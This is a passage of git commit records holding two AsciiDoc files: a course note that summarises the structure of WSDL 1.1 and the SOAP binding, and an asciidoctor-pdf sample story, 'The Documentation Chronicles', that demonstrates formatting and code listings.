{"commit":"d9cb9044be402ec7dfbdd08aa87c6fd37372aac2","subject":"Parent","message":"Parent\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"WSDL.adoc","new_file":"WSDL.adoc","new_contents":"= WSDL in brief\n:toc: preamble\n:sectanchors:\n\/\/works around awesome_bot bug that used to be published at github.com\/dkhamsing\/awesome_bot\/issues\/182.\n:emptyattribute:\n\nThis document gives a _rough_ and _incomplete_ overview of WSDL 1.1. 
(WSDL 2.0 is not widely supported at the moment.)\n\nNOTE: The reader is assumed to have basic knowledge of link:HTTP.adoc[HTTP], XML and link:SOAP.adoc[SOAP].\n\nNOTE: The parts marked BP are complements to the spec given by WS-I BP (all versions from 1.0 to 2.0) (see <<refs>>).\n\n\/\/\/\/\nTODO Find out how to escape bracket in [Public domain]; C++.\nLink image to https:\/\/commons.wikimedia.org\/wiki\/File:WSDL_11vs20.png\nReturn value?\nsoapAction may be left undefined?\nportType \u21d0 binding \u21d0 port \u21d0 soap:address\n\/\/\/\/\n\n== Overview\nThe Web Services Description Language (WSDL) spec defines a WSDL document. A WSDL document is an XML document that describes a web service, abstractly and concretely.\n\nExcept when mentioned otherwise, the elements this document refers to are XML elements with WSDL namespace [small]#(`\\http:\/\/schemas.xmlsoap.org\/wsdl\/`)#.\n\n.WSDL 1.1 (derived from work by Cristcost [Public domain], via Wikimedia Commons)\nimage:WSDL_11.png[Under a WSDL 1.1 document: an abstract description (types, message, portType), and a concrete description (binding, service)., float=\"left\"]\n\n* An abstract description indicates the operations that the web service provides, and the types it uses.\n** The types it uses are defined under `types` and `message` elements.\n** The operations are grouped together in `portType` elements. Though obscurely named, a `portType` simply represents a set of operations that coherently fit together (think about interfaces in Java, or abstract classes in C++).\n** A WSDL file may define several such `portType` elements.\n* A concrete description indicates how those abstract operations must be invoked, by linking them to an underlying exchange protocol, using a _link-type_.\n** This is done using two elements: `binding`, which makes operations concrete (and specifies how to encode types, \u2026), and `service`, which defines concrete endpoints. (Those two elements may appear several times in a document.)\n** A `service` contains a list of `port` elements. A `port`, or \u201cendpoint\u201d, indicates where the web service is to be reached.\n** The elements used inside the `binding` and `service` elements depend on the underlying exchange protocol adopted by the web service being described and thus depend on the chosen link-type.\n* WSDL defines three link-types to make abstract descriptions concrete: SOAP, HTTP GET\/POST and MIME. [small]#(It also defines an extension mechanism that permits defining more such link-types.)# This document only describes the SOAP link-type.\n\nSee https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315#_wsdl[Example 1] (W3C).\n\n== Internal references\nMany WSDL elements admit an optional `name` attribute. XML elements that admit a name may be referred to using a Qualified Name (QName). For example, the element `<portType name=\"StockQuotePortType\">` defined in a namespace recognized under the prefix `tns` can be referred to by the QName `tns:StockQuotePortType` (see https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315#_soap-e[Example 3]).\n\n== Types and messages\nXML schemas are typically used to define types. The types to be used can be defined under `types`, using the `xsd:schema` element (thus XSD import mechanisms may be used in the usual manner). [small]#(WSDL also allows for other type systems.)#
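\n\nFor example, a hedged sketch of a schema embedded under `types` (the target namespace and element name here are invented for illustration, not taken from the spec):\n\n[source,xml]\n----\n<types>\n <xsd:schema targetNamespace=\"http:\/\/example.com\/stockquote.xsd\"\n xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\">\n <!-- hypothetical element that a message part could reference via its element attribute -->\n <xsd:element name=\"tradePriceRequest\" type=\"xsd:string\"\/>\n <\/xsd:schema>\n<\/types>\n----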
\n\nThe types are used to define messages, using `message` elements.\n\n* A message consists of `part` elements.\n* Each `part` has a name, and indicates either an `element` QName or a `type` QName (that must be defined in a schema under the `types` element, see above).\n* How the parts are used depends on the link-type (see below). Typically, each part is a parameter of some operation or used as a return value.\n\n== Operations\nAn operation has a name, (usually) an input message, possibly an output message, and possibly fault messages. When output and fault messages are defined, it is to be understood that either the output or a fault will be returned, not both. Each of the `input`, `output` and `fault` elements designates the corresponding message using a QName.\n\n== SOAP link-type\nThe SOAP link-type is used to complement an abstract web service description (consisting of `types`, `message` and `portType` elements) in order to make it a description of a SOAP web service. The SOAP binding used is the HTTP one (see link:SOAP.adoc#HTTP_binding[SOAP in brief]). [small]#(WSDL tolerates other SOAP bindings as well.)# Such a link is done using one `binding` element per `portType` to be defined as a component of the SOAP web service, and one `service` element.\n\nThe `binding` element is used to specify how abstract messages sent to or from an abstract interface (defined as a `portType`) are to be serialized as SOAP messages.\n\n* The `binding` indicates, as its `type`, the QName of the `portType` it relates to (for example, `<binding type=\"tns:StockQuotePortType\">`).\n* The `binding` indicates that the link-type is SOAP by including as a sub-element the element `soap:binding`, where the `soap` prefix corresponds to the WSDL namespace for the WSDL SOAP link-type [small]#(\\http:\/\/schemas.xmlsoap.org\/wsdl\/soap12\/)#.\n* The `soap:binding` sub-element has a `transport` attribute, whose value is typically `\\http:\/\/schemas.xmlsoap.org\/soap\/http`, to indicate that the HTTP binding is chosen as a SOAP binding.\n* The `soap:binding` sub-element has a `style` attribute, whose value may be `document` (default) or `rpc`. [small]#(The `style` may also be set per-operation instead of for a whole `portType`.)#\n* The `binding` element has one `operation` sub-element per operation that is to be reachable by SOAP. That sub-element specifies linking information for the _abstract_ operation with the same name within the related `portType`. Each such `operation` element has a `<soap:operation soapAction=\"uri\"\/>` sub-element that specifies the SOAP action to use to target that operation. Each `operation` also has sub-elements for each of the input, output and faults defined in the corresponding abstract operation, each of which has a `soap:body` sub-element that, for `rpc` style, specifies a namespace (BP). Unbound parts are discouraged and should be ignored (BP http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#R2209[R2209]{emptyattribute}).\n\nHere is how to interpret this information (BP).\n\nWith `document` style, there can be at most one message part in a message [small]#(unless the `soap:body` `part` attribute is used)#. That part must be defined using the `element` attribute. It appears directly under the SOAP Body element.\n\nWith `rpc` style, each part is a parameter or a return value. Parts must be defined using the `type` attribute. 
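For illustration, a minimal sketch of a message suited to `rpc` style, with `type`-defined parts (all names here are hypothetical):\n\n[source,xml]\n----\n<message name=\"SetLastTradePriceInput\">\n <!-- hypothetical parts; each one becomes a parameter of the operation -->\n <part name=\"tickerSymbol\" type=\"xsd:string\"\/>\n <part name=\"price\" type=\"xsd:float\"\/>\n<\/message>\n----\n\nUnder the wrapper rules described next, a request using this message could be serialized as `<m:SetLastTradePrice><tickerSymbol>IBM<\/tickerSymbol><price>42.0<\/price><\/m:SetLastTradePrice>` inside the SOAP Body (assuming the operation is named `SetLastTradePrice` and its namespace is bound to the prefix `m`).\n\n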
The SOAP Body element will contain an operation wrapper element containing, for each part, a part wrapper element followed by the content of the part: `<opName><part1>\u2026<\/part1><part2>\u2026<\/part2><\/opName>`. The operation wrapper element namespace is the value of the `namespace` attribute of the `soap:body` element and its local name is either the name of the operation, for a SOAP Request, or the name of the operation suffixed with \u201cResponse\u201d. The `name` and `type` attributes of `part` elements define the local name and type of the corresponding part wrapper. Part wrappers have no namespace.\n\nDocument style is http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#Consistency_of_style_Attribute[encouraged].\n\nBP mandates unique operation signatures, so that an endpoint may identify which operation is invoked based on the input message. The operation signature is the fully qualified name of the child element of the SOAP body [small]#(assuming no wsa:Action SOAP header blocks are used)#.\n\nThe `service` element consists of a set of `port` elements. Each `port` refers to a given `binding` element using a QName.\nA sub-element of `port` gives the SOAP HTTP address to use to call the SOAP web service: `soap:address location=\"uri\"`.\n\n[[refs]]\n== Refs\n* W3C https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315[WSDL 1.1] note; https:\/\/www.w3.org\/Submission\/2006\/SUBM-wsdl11soap12-20060405\/[WSDL 1.1 to SOAP 1.2] link-type\n* WSDL https:\/\/www.w3.org\/TR\/?title=wsdl[Specifications] on W3C\n* Web Services Interoperability (http:\/\/www.ws-i.org\/[WS-I]) Basic Profile (BP) clarifies and modifies WSDL and related specifications to promote interoperability.\n\/\/* BP 2.0 corrected http:\/\/ws-i.org\/profiles\/basic\/1.1\/wsdl-2004-08-24.xsd[WSDL schema] TODO check 2.0 or 1.1?\n\n== Supplementary details\nWhat this document calls a link-type, namely the type of relation between the abstract and the concrete web service descriptions, is usually referred to as a _binding_. This presents risks of confusion with the WSDL `binding` element. Here the word \u201cbinding\u201d is only used to refer to the element.\n\nThe WSDL element `import` can be used to import WSDL documents into other WSDL documents. (The spec also allows using the WSDL `import` element to import XSD schemas, but this is now discouraged, see http:\/\/www.ws-i.org\/Profiles\/BasicProfile-1.0-2004-04-16.html#refinement16498504[BP 1.0] and later versions. The XSD import mechanism should be preferred.)\n\nIn WSDL 2.0, `portType` is called `interface`, and `port` is called `endpoint`.\n\nEach of the operation messages (input, \u2026) in a SOAP link-type has a `soap:body` whose `use` must (http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#R2706[BP 2.0], 1.1) be `literal` (or left to the default, `literal`, BP 1.2). (`encoded` is not used any more, see this https:\/\/docs.microsoft.com\/en-us\/previous-versions\/dotnet\/articles\/ms995710(v=msdn.10)[opinion]).\n\nBP 2.0 does not require the sender to set soapAction in the HTTP header nor as part of the Content-Type header. 
Thus, it may not be relied upon.\n\nAn operation can be classified as: One-way (input only); Request-response (with input, output, and possibly fault messages); or two other types (that this document is not concerned with).\n\n","old_contents":"= WSDL in brief\n:toc: preamble\n:sectanchors:\n\/\/works around awesome_bot bug that used to be published at github.com\/dkhamsing\/awesome_bot\/issues\/182.\n:emptyattribute:\n\nThis document gives a _rough_ and _incomplete_ overview of WSDL 1.1. (WSDL 2.0 being not much supported at the moment.)\n\nNOTE: The reader supposedly has basic knowledge of link:HTTP.adoc[HTTP], XML and link:SOAP.adoc[SOAP].\n\nNOTE: The parts marked BP are complements to the spec given by WS-I BP (all versions from 1.0 to 2.0) (see <<refs>>).\n\n\/\/\/\/\nTODO Find out how to escape bracket in [Public domain]; C++.\nLink image to https:\/\/commons.wikimedia.org\/wiki\/File:WSDL_11vs20.png\nReturn value?\nsoapAction may be left undefined?\nportType \u21d0 binding \u21d0 port \u21d0 soap:address\n\/\/\/\/\n\n== Overview\nThe Web Services Description Language (WSDL) spec defines a WSDL document. A WSDL document is an XML document that describes a web service, abstractly and concretely.\n\nExcept when mentioned otherwise, the elements this document refers to are XML elements with WSDL namespace [small]#(`\\http:\/\/schemas.xmlsoap.org\/wsdl\/`)#.\n\n.WSDL 1.1, derived from work by Cristcost [Public domain\\], via Wikimedia Commons\nimage:WSDL_11.png[Under a WSDL 1.1 document: an abstract description (types, message, portType), and a concrete description (binding, service)., float=\"left\"]\n\n* An abstract description indicates the operations that the web service provides, and the types it uses.\n** The types it uses are defined under `types` and `message` elements.\n** The operations are grouped together in `portType` elements. Though obscurely named, a `portType` simply represents a set of operations that coherently fit together (think about interfaces in Java, or abstract classes in C++).\n** A WSDL file may define several such `portType` elements.\n* A concrete description indicates how those abstract operations must be invoked, by linking them to an underlying exchange protocol, using a _link-type_.\n** This is done using two elements: `binding`, that makes operations concrete (and specify how to encode types, \u2026), and `service`, that defines concrete endpoints. (Those two elements may appear several times in a document.)\n** A `service` contains a list of `port` elements. A `port`, or \u201cendpoint\u201d, indicates where the web service is to be reached.\n** The elements used inside the `binding` and `service` elements depend on the underlying exchange protocol adopted by the web service being described, thus, depend on the chosen link-type.\n* WSDL defines three link-types to make abstract descriptions concrete: SOAP, HTTP GET\/POST and MIME. [small]#(It also defines an extension mechanism permitting to define more such link-types.)# This document only describes the SOAP link-type.\n\nSee https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315#_wsdl[Example 1] (W3C).\n\n== Internal references\nMany WSDL elements admit an optional `name` attribute. XML Elements which admit a name may be referred to using a Qualified Name (QName). 
For example, the element `<portType name=\"StockQuotePortType\">` defined in a namespace recognized under the prefix `tns` can be referred to by the QName `tns:StockQuotePortType` (see https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315#_soap-e[Example 3]).\n\n== Types and messages\nXML schema are typically used to define types. The types to be used can be defined under `types`, using the `xsd:schema` element (thus XSD import mechanisms may be used in the usual manner). [small]#(WSDL also allows for other type systems.)#\n\nThe types are used to define messages, using `message` elements.\n\n* A message consists of `part` elements.\n* Each `part` has a name, and indicates either an `element` QName or a `type` QName (that must be defined in a schema under the `types` element, see above).\n* How the parts are used depends on the link-type (see below). Typically, each part is a parameter of some operation or used as return value.\n\n== Operations\nAn operation has a name, (usually) an input message, possibly an output message, and possibly fault messages. When output and fault messages are defined, it is to be understood that either the output or a fault will be returned, not both. Each of the `input`, `output` and `fault` elements designate the corresponding message using a QName.\n\n== SOAP link-type\nThe SOAP link-type is used to complement an abstract web service description (consisting in `types`, `message` and `portType` elements) in order to make it a description of a SOAP web service. The SOAP binding used is the HTTP one (see link:SOAP.adoc#HTTP_binding[SOAP in brief]). [small]#(WSDL tolerates other SOAP bindings as well.)# Such a link is done using one `binding` element per `portType` to be defined as a component of the SOAP web service, and one `service` element.\n\nThe `binding` element is used to specify how abstract messages sent to or from an abstract interface (defined as a `portType`) are to be serialized as SOAP messages.\n\n* The `binding` indicates, as its `type`, the QName of the `portType` it relates to (for example, `<binding type=\"tns:StockQuotePortType\">`).\n* The `binding` indicates that the link-type is SOAP by including as a sub-element the element `soap:binding`, where the `soap` prefix corresponds to the WSDL namespace for WSDL SOAP link-type [small]#(\\http:\/\/schemas.xmlsoap.org\/wsdl\/soap12\/)#.\n* The `soap:binding` sub-element has a `transport` attribute, whose value is typically `\\http:\/\/schemas.xmlsoap.org\/soap\/http`, to indicate that the HTTP binding is chosen as a SOAP binding.\n* The `soap:binding` sub-element has a `style` attribute, whose value may be `document` (default) or `rpc`. [small]#(The `style` may also be set per-operation instead of for a whole `portType`.)#\n* The `binding` element has one `operation` sub-element per operation that is to be reachable by SOAP. That sub-element specifies linking information for the _abstract_ operation with the same name within the related `portType`. Each such `operation` element has a `<soap:operation soapAction=\"uri\"\/>` sub-element that specifies the SOAP action to use to target that operation. Each `operation` also has sub-elements for each of the input, output and faults defined in the corresponding abstract operation, with for each of those a sub-element `soap:body` that, for `rpc` style, specifies a namespace (BP). 
Unbound parts are discouraged and should be ignored (BP http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#R2209[R2209]{emptyattribute}).\n\nHere is how to interpret these informations (BP).\n\nWith `document` style, there can be at most one message part in a message [small]#(unless `soap:body` `part` attribute is used)#. That part must be defined using the `element` attribute. It appears directly under the SOAP Body element.\n\nWith `rpc` style, each part is a parameter or a return value. Parts must be defined using the `type` attribute. The SOAP Body element will contain an operation wrapper element containing, for each part, a part wrapper element followed by the content of the part: `<opName><part1>\u2026<\/part1><part2>\u2026<\/part2><\/opName>`. The operation wrapper element namespace is the value of the namespace attribute of the `soap:body` element and its local name is either the name of the operation, for a SOAP Request, or the name of the operation suffixed with \u201cResponse\u201d. The `name` and `type` attributes of `part` elements define the local name and type of the corresponding part wrapper. Part wrappers have no namespace.\n\nDocument style is http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#Consistency_of_style_Attribute[encouraged].\n\nBP mandates unique operation signatures, so that an endpoint may identify which operation is invoked based on the input message. The operation signature is the fully qualified name of the child element of the SOAP body [small]#(assuming no wsa:Action SOAP header blocks are used)#.\n\nThe `service` element consists in a set of `port` elements. Each `port` refers to a given `binding` element using a QName.\nA sub-element of `port` gives the SOAP HTTP address to use to call the SOAP web service: `soap:address location=\"uri\"`.\n\n[[refs]]\n== Refs\n* W3C https:\/\/www.w3.org\/TR\/2001\/NOTE-wsdl-20010315[WSDL 1.1] note; https:\/\/www.w3.org\/Submission\/2006\/SUBM-wsdl11soap12-20060405\/[WSDL 1.1 to SOAP 1.2] link-type\n* WSDL https:\/\/www.w3.org\/TR\/?title=wsdl[Specifications] on W3C\n* Web Services Interoperability (http:\/\/www.ws-i.org\/[WS-I]) Basic Profile (BP) clarifies and modifies WSDL and related specifications to promote interoperability.\n\/\/* BP 2.0 corrected http:\/\/ws-i.org\/profiles\/basic\/1.1\/wsdl-2004-08-24.xsd[WSDL schema] TODO check 2.0 or 1.1?\n\n== Supplementary details\nWhat this document calls a link-type, namely the type of relation between the abstract and the concrete web service descriptions, is usually referred to as a _binding_. This presents risks of confusion with the WSDL `binding` element. Here the word \u201cbinding\u201d is only used to refer to the element.\n\nThe WSDL element `import` can be used to import WSDL documents into other WSDL documents. (The spec also allows to use the WSDL `import` element to import XSD schemas, but this is now discouraged, see http:\/\/www.ws-i.org\/Profiles\/BasicProfile-1.0-2004-04-16.html#refinement16498504[BP 1.0] and later versions. The XSD import mechanism should be preferred.)\n\nIn WSDL 2.0, `portType` is called `interface`, `port` is called `endpoint`.\n\nEach of the operation message (input, \u2026) in a SOAP link-type has a `soap:body` whose `use` must (http:\/\/ws-i.org\/Profiles\/BasicProfile-2.0-2010-11-09.html#R2706[BP 2.0], 1.1) be `literal` (or left to the default, `literal`, BP 1.2). 
(`encoded` is not used any more, see this https:\/\/docs.microsoft.com\/en-us\/previous-versions\/dotnet\/articles\/ms995710(v=msdn.10)[opinion]).\n\nBP 2.0 does not require the sender to set soapAction in the HTTP header nor as part of the Content-Type header. Thus, it may not be relied upon.\n\nAn operation can be classified as: One-way (input only); Request-response (with input, output, and possibly fault messages); or other two types (that this document is not concerned with).\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"1dc07d931e31de452d6dd9d7c387b5e202b65631","subject":"minor rephrasing in chronicles example","message":"minor rephrasing in chronicles example\n","repos":"Hextremist\/asciidoctor-pdf,Hextremist\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf,asciidoctor\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,mojavelinux\/asciidoctor-pdf,dsisnero\/asciidoctor-pdf","old_file":"examples\/chronicles-example.adoc","new_file":"examples\/chronicles-example.adoc","new_contents":"= The Dangerous & _Thrilling_ Documentation Chronicles: Based on True Events\nKismet Cam\u00e9l\u00e9on; Lazarus het_Draeke\nv1.0, 2014-01-01: The first incarnation of The Documentation Chronicles.\n:description: This story chronicles the inexplicable hazards and vicious beasts a \\\nteam must conquer and vanquish on their journey to discovering the true power of \\\nOpen Source.\n:doctype: book\n\/\/ Settings:\n:experimental:\n:icons: font\n:listing-caption: Listing\n:sectnums:\n:toc:\n:toclevels: 3\nifdef::backend-pdf[]\n:title-logo-image: image:sample-banner.svg[pdfwidth=4.25in,align=center]\n:source-highlighter: rouge\n\/\/:rouge-style: github\n\/\/:source-highlighter: pygments\n\/\/:pygments-style: tango\nendif::[]\n\/\/ URIs:\n:wolper-uri: http:\/\/en.wikipedia.org\/wiki\/Wolpertinger\n\n[abstract]\n{description}\n\n== It's a City Under Siege\n\nThis journey begins one late Monday afternoon at http:\/\/www.devoxx.be[Devoxx].\nOur team needs coffee, _desperately_, but none of us dare open the theater doors...\n\nDuring the first workshop, a script-happy warlock inadvertently released a legion of Wolpertingers!\nTo leave now would mean *code dismemberment and certain death*.\n\nBehold -> the horror!\n\n.Wolpertinger, stuffed\n[.left.thumb]\nimage::wolpertinger.jpg[Wolpertinger,pdfwidth=50%,link=http:\/\/en.wikipedia.org\/wiki\/Wolpertinger]\n\nYou may not be familiar with these {wolper-uri}[ravenous beasts].\nTrust us, they'll eat your shorts and suck loops from your code.\nIn light of this danger, we've searched high and wide for the security crew's defensive operations manual.\nWe can't find it and the DefOps{empty}footnote:[a portmanteau of \u201cdefensive\u201d and \u201coperations\u201d] werewolves haven't returned from their rendezvous at Bier Central.\nThey've either eaten each other or fallen victim to the Wolpertingers roaming the streets of Antwerp.\nQuick, hit kbd:[Ctrl,Alt,Backspace] or select menu:File[Quit] and let's bail out of here!\n\nWARNING: Working with werewolves leads to howling and trying to train aggressive regular expressions with Pavlovian reinforcement.\n\n_Weak light from the hallway trickled across the theater, chased by a distant scream._\n\n=== Rendezvous Point\n\nCome on, _Bier Central_.\nDid you have to ask?\nIf you beat me there, I'll take a http:\/\/www.sintbernardus.be\/stbernardusabt12.php?l=en[St. 
Bernardus Abt 12].\n\n[#ravages]\n== The Ravages of Writing\n\nCrystalline XML tags relentlessly bombarded the theater.\n\n.XML tags\n[source,xml]\n----\n<author id=\"1\">\n <personname>\n <firstname>Lazarus<\/firstname>\n <surname>het Draeke<\/surname>\n <\/personname>\n<\/author>\n----\n\nDespite the assault, we were still attempting to draft an example of a defensive operation.\n\n.DefOps Plan\n====\nClick btn:[Download Zip] to download the defensive operation plan bundle.\n\nOMG!\nSomebody please save us now!\nI want my mum...and an extra-large double macchiato, please.\n====\n\nUnfortunately, Lazarus and I had both come to the conclusion that we weren't going to get out of this without corrupted hard drives if we didn't locate caffeine within the next few hours.\n\n=== A Recipe for Potion That Will Ensure You Win the Hearts of Developers\n\nThis potion for a sample document contains the following ingredients, which are listed in a very random, chaotically nested order.\n\n.Ingredients for Potion that Demystifies Documents\n* all the headings\n** syntax highlighted source code\n*** non-syntax highlighted source code or just a listing block\n* quote block\n** verse block\n*** table with some cell formatting\n**** sequential paragraphs\n***** admonition blocks, but use them sparingly\n*** bullet list with nesting\n** numbered list with nesting\n** definition list\n*** sidebar\n* example block\n** block image (no inline images)\n*** inline formatting in a paragraph\n**** two fresh Burdockian leaves\n***** They must be harvested by the light of the teal moons.\n\nAre you square?\n\n[square]\n* one\n* two\n* three\n\nWhat is there to do?\n\n* [x] Done\n* [ ] Next\n* Who's counting?\n\n==== Searching for Burdockian\n\n.Steps for finding and preparing Burdockian leaves\n. Locate dusty botany\n.. Sneeze\n... Sneeze some more\n. Find section on Burdockian\n.. Review its characteristics\n... Take a picture of the diagram of its leaves\n.... Don't rip out the picture like a troglodyte\n..... Don't do it, I'm watching you\n. Put on your hiking boots\n. Freeze your butt off on the side of a mountain at midnight\n\nLet's skip a few steps and start counting from 10.\n\n[start=10]\n. arabic (10)\n.. loweralpha (a)\n... lowerroman (i)\n... lowerroman (ii)\n... lowerroman (iii)\n... lowerroman (iv)\n.... upperalpha (A)\n. arabic (11)\n\nIt's time for a top 5 list, made using the `reversed` option on an ordered list!\n\n[%reversed]\n. Stone Imperial Russian Stout\n. Pliny the Elder\n. Chimay Grande R\u00e9serve (Blue)\n. St. Bernardus Abt 12\n. 
Westvleteren 12 (XII)\n\nHow about a list with some terms?\n\n* Fruits\n\nApple::\nThe round fruit of a tree of the rose family, which typically has thin red or green skin and crisp flesh.\nYes, I said _flesh_.\n\nPear::\nA yellowish- or brownish-green edible fruit that is typically narrow at the stalk and wider toward the base, with sweet, slightly gritty flesh.\nMore flesh.\nMmmmm.\n\n* Vegetables\n\nCarrot::\nAn orange-colored root eaten as a vegetable.\nBeware, it's a favorite of the Wolpertinger.\n\n===== Are You Still Here?\n\n.Move, move, move!\n[CAUTION]\n====\nThe Wolpertingers can smell your procrastination.\nIt's not their fault you can't find your boots.\n====\n\n====== Sigh...\n\nTIP: Your boots are in your closet.\n\n== Dawn on the Plateau\n\nLazarus was hanging from the bottom limb of a Burdockian tree, licking the bark.\n\n[quote,Mark Tobey]\nOn pavements and the bark of trees I have found whole worlds.\n\n\"`If there are whole worlds on that bark, he just swallowed them,`\" Kizmet replied.\n\n[verse,The documentation attorneys]\n____\nNo bark was harmed in the making of this potion.\n We're not so sure about a couple ants though.\n\n Nor those worlds...\n\n Crap, I smell an injunction.\n____\n\nWe'd retrieved the leaves, but we'd obviously lost our minds in the process.\n\n[verse]\nRoses are +++<span style=\"color: #FF0000\">red<\/span>+++.\nViolets are +++<span style=\"color: #0000FF\">blue<\/span>+++__-ish__.\n\n== Words Seasoned with Power\n\n_To tame_ the wild wolpertingers we needed to build a *charm*.\nBut **u**ltimate victory could only be won if we divined the *_true name_* of the __war__lock.\n\n\"`What kind of charm?`\" Lazarus asked. \"`An odoriferous one or a mineral one?`\"\nKizmet shrugged. \"`The note from Olaf's desk says '`wormwood and licorice,`' but these could be normal groceries for werewolves.`\"\n\n\"`Well the H~2~O written on the security whiteboard could be part of a shopping list, but I don't think the local bodega also sells e = mc^2^,`\" Lazarus replied.\n\n\"`Wait!`\" Indigo plucked a small vial from her desk's top drawer and held it toward us.\nThe vial's label read '```e = mc^2^ *_the scent of science_* _smells like a genius_```'.\n\n=== Can I Get Some `Code`?\n\n[%hardbreaks]\nSure.\nHave a listing block.\n\n----\nThis is an example of a listing block.\nThe content inside is rendered as <pre> text.\n----\n\nBut I'm not giving you any highlighting shazam just yet.\n\n.What is a listing block?\n****\nLike literal blocks, the content in listing blocks is displayed exactly as you entered it.\nListing block content is rendered as `<pre>` text.\n\nThe `listing` style is applied to an element, such as a paragraph, by setting the `listing` attribute on that element.\n****\n\nLet's get our highlighting on!\n\n<<<\n\nInstall Prawn:\n\n $ gem install prawn\n\nThen create your first PDF document in Ruby!\n\n.Generates a basic PDF document using Prawn\n```ruby\nrequire 'prawn' # <1>\n\nPrawn::Document.generate 'output.pdf' do # <3>\n text 'Hello, World!' # <2>\nend\n```\n<1> Imports Prawn library\n<2> Adds text \u201cHello, World!\u201d to first page\n<3> Writes PDF to [file]_output.pdf_ after executing all statements\n\nHow about some source code that styles code? 
So meta!\n\n```css\ncode {\n padding: 2px 4px;\n font-size: 90%;\n color: #c7254e;\n white-space: nowrap !important;\n background-color: #f9f2f4;\n border-radius: 4px;\n}\n```\n\nWhere could we go without some Java?\nNaturally, some autosizing is necessary.\n\n[source%autofit,java]\n----\npackage org.javaee7.cdi.events;\n\nimport javax.annotation.PostConstruct;\nimport javax.enterprise.context.SessionScoped;\nimport javax.enterprise.event.Observes;\nimport java.io.Serializable;\nimport java.util.ArrayList;\nimport java.util.Collections;\nimport java.util.List;\nimport javax.ws.rs.*;\n\n\/**\n * This session-scoped bean receives greeting strings from the event bus\n * and provides access to the collection of these greetings via a REST API.\n *\n * @author The Duke\n * @since 1.0\n *\/\n@SessionScoped\npublic class GreetingReceiver implements EventReceiver, Serializable {\n\n private List<String> greetings;\n\n @PostConstruct\n void init() {\n this.greetings = new ArrayList<String>();\n }\n\n void receive(@Observes String greet) {\n this.greetings.add(greet);\n }\n\n @GET\n @Produces(\"application\/json\")\n public List<String> listAll(@QueryParam(\"start\") Integer start, @QueryParam(\"max\") Integer max) {\n int numGreetings = this.greetings.size();\n\n if (numGreetings == 0 || max == 0) {\n return Collections.<String>emptyList();\n }\n\n if (start == null) {\n start = 0;\n }\n\n if (max == null) {\n max = numGreetings;\n }\n\n return this.greetings.subList(start, Math.min(max + start, numGreetings));\n }\n\n}\n----\n\nWe already showed you an XML example in <<ravages>>.\n\nI'll trade you a little table for some of that bark.\n\n[cols=3,frame=topbot,grid=rows]\n|===\n|Name of Column 1 |Name of Column 2 |Name of Column 3\n\n^m|Prefix the `{vbar}` with `{caret}` to center content horizontally\n.<|Prefix the `{vbar}` with a `.` and `<` to align the content to the top of the cell\n>|Prefix the `{vbar}` with `>` to align the content to the right horizontally\n\n3+^.^e|This content spans all three columns (`3{plus}`) and is centered both horizontally (`{caret}`) and vertically (`.{caret}`) within the cell.\n|===\n\nWait.\nWhat?\nWhere is this story going?\n\n`<span>`:: an html tag that makes me crazy\n\nalign:: something I never get going in the right direction.\nAlso has to do with my poor verbal communication skills\n\nfloat::\nstyle::\ndon't make me laugh\n\nDoes anyone have the time?\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.\nUt enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.\nDuis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.\nExcepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n\n== Keeping It Together\n\nOn this page we have nested \"`keep together`\" logic.\nThe combined block will be shifted to the next page if there isn't room available on this one.\n\n[verse]\nFirst,\nwe\nneed\nto\nwaste\nseveral\nlines\nusing\na\nverse\nto\npush\nthe\nnext\nblock\nto\nits\nbreaking\npoint.\n\n[NOTE]\n.What happens if there is both a field and a method with the same name?\n====\nBack to the previous example, suppose that we have both a field and a method with the same name, as in:\n\n.Java class with a field and method that share the same name\n[source,java]\n----\npublic class Foo {\n public String bar;\n\n public String bar() {\n return bar;\n 
}\n}\n----\n\n*Golo resolves methods first, fields last.*\nHence, the following Golo code will resolve the `bar()` method, not the `bar` field:\n\n.Golo picks the method over the field with the same name\n[source,golo]\n----\nlet foo = Foo()\n\nfoo: bar(\"baz\") # <1>\n\nprintln(foo: bar()) # <2>\n----\n<1> Writes the field\n<2> Calls the `bar()` method\n====\n\n<<<\n\nHere's a preview of how each heading level is rendered.\n\n[discrete]\n= Heading 1 (Level 0)\n\nfiller content\n\n[discrete]\n== Heading 2 (Level 1)\n\nfiller content\n\n[discrete]\n=== Heading 3 (Level 2)\n\nfiller content\n\n[discrete]\n==== Heading 4 (Level 3)\n\nfiller content\n\n[discrete]\n===== Heading 5 (Level 4)\n\nfiller content\n\n[discrete]\n====== Heading 6 (Level 5)\n\nfiller content\n\n---\n\n--\nHere's some content inside an open block.\n--\n\n[appendix]\n== Credits\n\n.Brought to you with icon:heart[] by OpenDevise\n[%header%footer,cols=\"2,2s,3\",grid=rows,frame=topbot,width=75%,caption=]\n|===\n|Name\n|Title\n|Alias\n\n|Sarah White\n|President\n|http:\/\/twitter.com\/carbonfray[@carbonfray]\n\n|Dan Allen\n|Vice President\n|http:\/\/twitter.com\/mojavelinux[@mojavelinux]\n\n3+^.e|Powered by Open Source\n|===\n","old_contents":"= The Dangerous & _Thrilling_ Documentation Chronicles: Based on True Events\nKismet Cam\u00e9l\u00e9on; Lazarus het_Draeke\nv1.0, 2014-01-01: The first incarnation of The Documentation 